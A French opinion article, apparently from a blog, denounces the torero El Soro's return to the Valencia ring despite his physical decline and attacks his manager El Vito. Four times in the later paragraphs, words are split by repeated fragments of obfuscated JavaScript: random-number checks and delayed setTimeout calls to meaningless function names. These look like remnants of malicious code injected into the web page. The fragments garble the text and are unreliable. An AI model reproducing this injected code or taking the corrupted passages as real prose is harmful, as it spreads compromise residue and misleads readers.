LE SORO

Qu’un homme –un torero-, après avoir subi pendant des années un interminable corollaire d’interventions chirurgicales pour enrayer sa boiterie, soumis à une discipline de fer pour perdre des dizaines de kilos et récupérer dans la mesure du possible la forme physique nécessaire, ait réussi à porter de nouveau l’habit de lumières et à affronter deux toros de quatre ans d’une demie tonne, c’est bien un héroïque exemple de surpassement et une preuve surprenante des limites que peut franchir l’homme.

Un vrai miracle, pourrions nous exclamer. Comme ce fut de le voir à nouveau faire le paseo lors du festival de Balmaseda, en juillet dernier –ses retrouvailles avec la tauromachie- ou son retour en costume de lumières à Játiva et dans son village natal. Restait-il quelque chose à faire ? Si, s’annoncer à nouveau dans les arènes de Valence ; sur cette même piste qui a cimenté sa carrière et où il a atteint les plus hauts sommets de popularité. C’était une folie, un non-sens, une absurdité et une témérité ; cependant, qui pouvait refuser à Vicente l’opportunité de vivre et de ressentir cette utopie tant de fois rêvée tout au long du calvaire qui l’a précédée ?

Et il était à l’affiche de Valence, et il apparut dans l’arène avec l’espoir et l’engament intact, avec la responsabilité de ne pas décevoir ses partisans, et il eut la chance, même si le toro n’avait pas été fait expressément, de tomber sur un qui était le plus idoine pour qu’il brille. Il y eut aussi un autre miracle. Mais il fut plein d’une irréfutable réalité : le Soro n’est pas en état de porter l’habit de lumières et encore moins d’être à l’affiche d’une feria du niveau de celle des Fallas. L’âge ne pardonne pas et l’habit non plus. Son image, bouffie, ridicule, d’infirme, versait plus dans la caricature et la bouffonnerie, qu’à la prestance et à la tenue que l’on doit exiger d’un matador de toros. Toute sa prestation –ardente, volontaire, engagée- oscilla entre le pathétique et l’obscène. Et cela ne concerne pas le show quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il planta au centre de l’arène le drapeau de Valence ni autres ridicules folklorismes, mais par sa tauromachie heurtée où sa volonté et son courage indiscutables étaient incapables de faire face à un empêchement physique qui faisait penser à ce que l’on pourrait appeler un torero « sonné ».

La tauromachie mérite plus de respect et les toreros sont les premiers obligés de le faire ; c’est pour cette raison que El Soro ne doit plus porte l’habit de lumières. Et c’est pour ça que je suis indigné par les déclarations de El Vito –l’un de ses apoderados- quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il manifestait que « El Soro n’est pas fini. Nous continuons » ou encore que « les organisateurs vont vouloir sortir le Soro du lit ». Je ressens de la répugnance vis-à-vis de ce genre d’individus sans scrupules, capables de jeter aux lions un homme handom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andicapé pour cette profession ou de transformer le toreo en une grossière plaisanterie, tout ceci pour avoir leur commission. Des énergumènes de ce type n’ont pas leur place dans la corrida et il vaudrait mieux les virer.

Les organisateurs devraient mettre de jeunes matadors et raviver la flamme dans ces corridas où El Soro prétend être à l’affiche –dans cette folie qui lui empêche de voir en face la réalité-. La fiesta des toros le demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande et l’exige. Il en sera gré. N’en doutons point.

Les commentaires sont fermés.